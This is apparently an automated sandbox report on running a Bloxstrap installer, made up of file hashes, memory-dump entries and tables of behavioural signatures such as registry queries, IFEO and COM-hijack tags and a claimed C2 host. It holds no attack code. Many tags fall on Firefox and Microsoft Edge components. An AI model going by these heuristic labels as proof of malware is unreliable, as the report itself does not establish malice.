C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\storage\default\https+++www.youtube.com\idb\1673676299yCt7G%cCf7C%oendfdi3g.sqlite
| MD5 | aa71c21a3171a8d931ea05618b12fcf5 |
| SHA1 | a37e5ad86ae31351d03d9b95e196a97d6b77e95b |
| SHA256 | fb9cbc7f169a9ab398fa50b8fff1491c2e5442cd0d97d1305690ec6d7057c0af |
| SHA512 | 9cfdeebd97a5d1a92a65f7fbd5c6545c7d183a41969ed7149296d9dc78c09c1c053e2c8d7333035683d34437724ec0dc504cfd9533d5190ae167a47c8a71a27d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\storage\default\https+++www.youtube.com\cache\morgue\121\{84f2fb5e-175f-46fa-9336-9befbeaf8c79}.final
| MD5 | c29c5ff50aa0fd8a46cdfabb014ee3b8 |
| SHA1 | 35548ec8c690c71d36129911d1fc067a9bb848e0 |
| SHA256 | 4e4f53e7b016e60e9821928304849677ec0a48ec864b94941fbfedb16c73b44e |
| SHA512 | 27e6ba5bb678dff4f508e6142f0e6292571a038487881a4ac8a68d883c7a8514422f3a4fd38ba615817ed811599a359e0386d52bafd44714e6d4d49a37af9f48 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\storage\default\https+++www.youtube.com\cache\morgue\233\{fd7de19f-6673-4685-8eaa-9d00d29c4ae9}.final
| MD5 | 1a28edd17b38323e8406fe0dee0a7c3b |
| SHA1 | 86717a9231eb082507ab8d5a7d58b14a9b90fceb |
| SHA256 | 2af72d7f30b31451ceea679f2eca1efc33967fca267c79e8ccd3c18e325b7305 |
| SHA512 | ee92e26210569dc795f68a8cd15d333e6a0ece1b839b8e2a078c20beed93bd573f8aac6e7aa6a031f254c99490c489f184748b7f1a156a68a24b8f824e8fd2c0 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dom8snqr.default-release\cache2\entries\33F349DB91A26948B30584EDC4AF7483570D2C7D
| MD5 | 78fb2d434cfa926f124eb7b599c85c1f |
| SHA1 | 35cd44d9713de7db8fd853e7aeb5b5d32e86b945 |
| SHA256 | 7218949795fde3b95797dc7d8f97810f038f55fbcb610d24f243eca359e7d500 |
| SHA512 | 0828480c63be96fbc24624211b3f2c176c68d12c13edda599dabe8c7c747c2488adc9690a592d4759c1092cf472c4f6357a037503ec923eaa6fa7757662dd274 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 761a767083c42184023065b500ea3868 |
| SHA1 | 31ad7acf16b4ec4a751afcfdd3b2cf1868a5c925 |
| SHA256 | cfc5b4a51c9613a15d34bee15034d4da4dbb8eb2633a5be63360df79e26ab38a |
| SHA512 | acba4d038210ba07b74389363224cee4e5a23cba997f5551b23621b27958c09820194895a352eb5f6572d810ce7a45289e975ebd6269c8195be844cef80c3fb8 |
memory/7276-14720-0x0000000000AB0000-0x0000000000AE5000-memory.dmp
memory/7604-14754-0x00007FFECBC90000-0x00007FFECBC91000-memory.dmp
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Code Cache\wasm\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State
| MD5 | dfe421275f943de4622f6419b9364f60 |
| SHA1 | 1c3c6fe2aaec454d7f65f807a32f73fb85e5bcd4 |
| SHA256 | ac0c5c0e83b0f97c658ff9b17d6e1942784350ce83913a1df5f7846b20412cb0 |
| SHA512 | ae811d601191f2ba4a55c73cc0235715b52d4c5a3d80619d8f7a00a2355d47c6de44435064e7c33bc3f7a489a37ecf09b154c7053579b06daa3d166f187c2ff3 |
memory/8252-14795-0x00007FFECCC80000-0x00007FFECCC81000-memory.dmp
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State
| MD5 | 36112e4fe7effe74d1a7058f401d91d7 |
| SHA1 | 9227dee05e5cafa53b76e0f100e976843c90746a |
| SHA256 | d2b4c59f2f0e17a81a9bfa95a6beb75aa090fab3bee6e3ce189b24fa951bd626 |
| SHA512 | c82003cbd95965b1c95cde9da7aba80666083af37cc042341deda7d9ad096dcaaa0d47af8f79b058f1b8adad8cd6b82f24c4f352177a491c4c035042cb67fd2a |
memory/8252-14796-0x00007FFECCA00000-0x00007FFECCA01000-memory.dmp
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Crashpad\settings.dat
| MD5 | 0d4657d3657f883e3c2bf54150c8e9bd |
| SHA1 | 17ef786031e429a75df7b6199528cea5ddbd0c6c |
| SHA256 | e71da5024014cb0fbdf4754336bb8289359c5b5c3b06af5311676810fb32ae3f |
| SHA512 | 2efaf101ed4559a930f77b7a9a071585cdf671c03cac6d984e0670403ff4d50fa656baae6608fa53ef7ec32b8e609b4fe47f4e5f123f50e5c751d1c10ffdffb7 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State
| MD5 | f3c4ab0ee912e331158474162433c5b3 |
| SHA1 | af96f4b3629ccea7ae4da30a3a4f5baabf7b750e |
| SHA256 | 22fba6d304526d9bb0ad60a9518688b9f9f77c6371ef1bec375a792e8ad046af |
| SHA512 | 777f666da4aa17e4bec3ec5b1b0efe2b4268b6fdfe3552eff4fbfaedcfbad6bb7a4a82e86b91ce7b0cf898c680eb7944afa08cb489249a2ab9f7ca4a73692b0b |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State~RFe6868c9.TMP
| MD5 | 703dc09ba3f6a5f262bade8632ece92e |
| SHA1 | 959cfa0e798a4d36da88cc69188056e9f9863ab7 |
| SHA256 | e4cddbce0ca1e0ebd1bd56296598fc4283e1573aba7fd85e01090d820f821cdd |
| SHA512 | 7ef3f15bd46c1f08a2bf41b7c065335a2698db484994f473d54242c829eb9a7c0c0955867b1da11b5aa6454c607a5535a4af4cff82bac5329e66da1a5f5977fc |
memory/10228-14847-0x00007FFECBC90000-0x00007FFECBC91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vs1tj0uk.42s.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\AlternateServices.bin
| MD5 | 559e447ad8beec77d015c09653aadb5f |
| SHA1 | 17a3b02cd225376029a0978b2646521888401190 |
| SHA256 | 354318d2d725c926431308cfa7e22b1a41160d3a01181613f70d117207922234 |
| SHA512 | 53abc884393923b8674acdbf9008c57ad4ea3e805a1f1b0f08007f8dd45ee1ff26c05e86b4528892c1ec812ebc98c466e9e13c01aa28e21edccef6afd2ea8874 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State
| MD5 | df6a8d481130af10a71de71ef6962cdd |
| SHA1 | ea062455a4d244ceeb5dfcb18a55bba14276c059 |
| SHA256 | dc7727435b78b0a9556ebfdeac663eccc11efb294437ad5db2b4cc6b46b7b16c |
| SHA512 | b5ae95055a45d06e3a369df49dad1a9a1f2296cb4a6bd0d8920bcd21f1447a1e5232555124b6fc4d31a06104b42b48d061520f8e0284cab3899f481db09dfd16 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Preferences
| MD5 | 00e3f2d93753d8038ba7d4c0a82e90a4 |
| SHA1 | 62b6fc73c3023b815f2f2b71513b39be293a0388 |
| SHA256 | 1ca7591395df83daed51a217a18f753ace04076ad5178a9771f54899d0b7839f |
| SHA512 | fd2aef2ad8d7e79b2545d5ac2f59de8303cc53084420702dc3ac89dd0e5082e602748741aefad184570f454b709e2eb07d2a22cb9bbb8dc5287ced99341a3643 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Local State
| MD5 | a0c8d7c9aac3c322135478859cae5a27 |
| SHA1 | 9be47f26471493c9a46a1b5fecccade6369be6c6 |
| SHA256 | 9dc54e3023d2b1195873c3ab7cc743678e5fd51586584eaec674c6fd11f143d6 |
| SHA512 | 1fd54d6e96b9c143d19689846052306bb50102995725183faaf6f7eff3e2a908d7d26ebc24c06a7c10588d2ab9a9995b7f1e2c51024b9a38e321eeabaeff863b |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Preferences~RFe68971d.TMP
| MD5 | 4a31e38f4498504320363b0f72bd9fe0 |
| SHA1 | 9c8fe4a3ecbf330d4c7c4c86e505b0eee2ab6bab |
| SHA256 | 58ce090754d4504d9e5c53778f95b7272552034bf1f57d7eb43b3a4c335d9eb8 |
| SHA512 | 705b1a9ba66da23099dc11d6186d0e1d16a0676035fe40c85df1816fe787b92dc9fbb9dcc347f0cb751798ced337c3364be768b56614b7831a4702a5a19f03a6 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e6494fdfde5ef22fadc5d6e3c7c51c2d |
| SHA1 | fd7ac0ba44b3ada500a2e59f87ebf50c1095fc97 |
| SHA256 | ea17a2b6963f315d050a8d78974654d8c715553e0c217302f6406966e9302312 |
| SHA512 | c3a77c76ddce0e06ebf605b80ef998012796d48fd08cb4f98d07e6190d7ee35248f4a57a17998acd1b68a7a14e19fdbd50a5f2263b6ba352d6aa8c275fe7bd4f |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Code Cache\js\index-dir\the-real-index~RFe68971d.TMP
| MD5 | 91fb8d4d27013f57a9881e51a55eea86 |
| SHA1 | c9053472cc3dc65fc20f9cda154d0072cc443434 |
| SHA256 | 7bc70c781715e3226cccc19d37fe0c6247f94256a79b9f098c041cc611878cf9 |
| SHA512 | 565e0d9bcb26ec6f95fd99de3377255c2b25eeb4578fcf500b88c79b54dd416eb192a5ecf55254d2fffda97ab374e063d42a73fee525ba11aa97304206f81958 |
C:\Users\Admin\AppData\Roaming\setup.exe\EBWebView\Default\Network\Network Persistent State
| MD5 | 877f5894db6af207ee0e6d5e9e006406 |
| SHA1 | 7865fdf723003044bf8ada1746f32107a20ea364 |
| SHA256 | 06e229c6d2a9badf34b645613ba3e17f5001ea441bc650b31d6c7b98af9b868c |
| SHA512 | eef3c72cca96150e41409be2ba7bef3bb68c9b53c99bcd254dbc8d8d8b9cfe8d3069131fa17d1c95d33d4804f84dbc7bb3b0ab92771973212410fe45f6ed7f03 |
memory/10228-15110-0x000001BC64B70000-0x000001BC64C0E000-memory.dmp
memory/7604-15141-0x0000018CF7F90000-0x0000018CF802E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 9473cfd446acec0c2eb595454cb198d5 |
| SHA1 | e754d5b132216097eb3607f7c2e95b7328cc5d61 |
| SHA256 | 57f576ccbddd50ef77a69feb0d25773daa314f63f658e245c79f75a6b6a8affe |
| SHA512 | 68ee045c1a0f5d0cccfe7dc5cf2597b9a3090a6d74a13b1fea5b49d54eefca1e6796e24223e908f3696ef63179cf4c19eb5c853cc3b10caf97867f885d99f52f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | c336aabf36e8ed97efe51ec265ef082d |
| SHA1 | 49557aea76995e44eb1db0c0752b735ada5ad428 |
| SHA256 | 630a0284943826eb4857a47c1cc6decb3e5d31729ad5d3e57cefcdb2c02b3a74 |
| SHA512 | 2a907db3df8997554f2633fa3c9cd02fc904348c507571c865a12e518f9f48d8191582daea5842102e40aab803c48af5d498ca2dd7625ca80b1061acd1ee6dec |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\AlternateServices.bin
| MD5 | 1b4aec9ec5ef30d9c70400a0a51189a4 |
| SHA1 | 276cc23172401bf7309b322e492bcef82a54463f |
| SHA256 | 003b5a0bd2ec92ef7cbdbc64d092120d568f44f2fb78b91f14b521d743592cc6 |
| SHA512 | ab484c551cc31ee5810e5bad92175ff4fb33070bfdb390933fb69c7837a55cfcc8ec09baeb1d349cd5f1d88fd0295f7205d8f59adc518271bab1878b697658ab |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\671cd2b750753.vbs
| MD5 | cebb0eab997cf2f955c7f08e070fbd76 |
| SHA1 | 44622542b8713d19551f178085777d2423b0bb38 |
| SHA256 | 39d1b6861f477d578edcfa8f253011d5ea94278a1946e79069723ebb0ee45cce |
| SHA512 | d99609b543738ec6c6dcdebd04fdc3d501760baae2fd7c349633abd9b2720eb7d2fb0a2bb631e88d362523b8ef8f7607f5c3591727d0b198d880fa8983564c76 |
memory/7336-15377-0x000002C283B60000-0x000002C283B9E000-memory.dmp
memory/9720-15399-0x0000000000400000-0x000000000045E000-memory.dmp
memory/9720-15398-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\AlternateServices.bin
| MD5 | ad5ab7645438639aedcb70b518873007 |
| SHA1 | 08d8591786d737160243bd1138bfb591d7f97560 |
| SHA256 | a62c09c154e34d1a16dd99b79603abbb7e7d75b49d14d466289a3356e2dc6716 |
| SHA512 | 9c3ecd13894e978e73e3401cbd8c94eab55b288fbc0393fb407e2e8d8cd5d59a59d73c6a6b20a8c55d768c7558d86a2844e5abdcee1c5c04222a287acace604f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
| MD5 | 55a0dbbc8f02062e10ab90868ed0530d |
| SHA1 | 79977b9d8075c33314ec4385942a1c9320751c1c |
| SHA256 | 25c7306a8276fc34f5a0eb7dbfd6524bc1b2a71b5e510fe10577d6a48b18fab6 |
| SHA512 | 9ea35a216f01732ab79e0bfe4c36f593d83759c52d31d2171372c6052af832bc64271fd050147ac71659f4dc959d3e7fa5cc9743d5ca331e0068d711aca66d4d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dom8snqr.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 9635c04b04cc6e537634bceaad52d48a |
| SHA1 | 976c49f18c5774127b28f05b23600eee8330e2d3 |
| SHA256 | a079587e61f245d3af6a555c7f517a5d11745bc73f1af82df2cedef1118fe790 |
| SHA512 | 988a8df2d6ab341fdbf44589759dab51b64dd67905148903cf29c07383e8f48c42df71b3b05848b2bd409fbf213f21bf494e563928010f9d0f6d5d698ed6e0d2 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 13:09
Reported
2024-10-27 13:16
Platform
win10v2004-20241007-en
Max time kernel
453s
Max time network
456s
Command Line
Signatures
Downloads MZ/PE file
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{270397C0-49F3-4D34-AE72-5CEFE7F752B3}\EDGEMITMP_8058C.tmp\setup.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\RobloxPlayerBeta.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Bloxstrap-v2.8.0.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Bloxstrap\Roblox\Player\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Temp\EU41D8.tmp\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
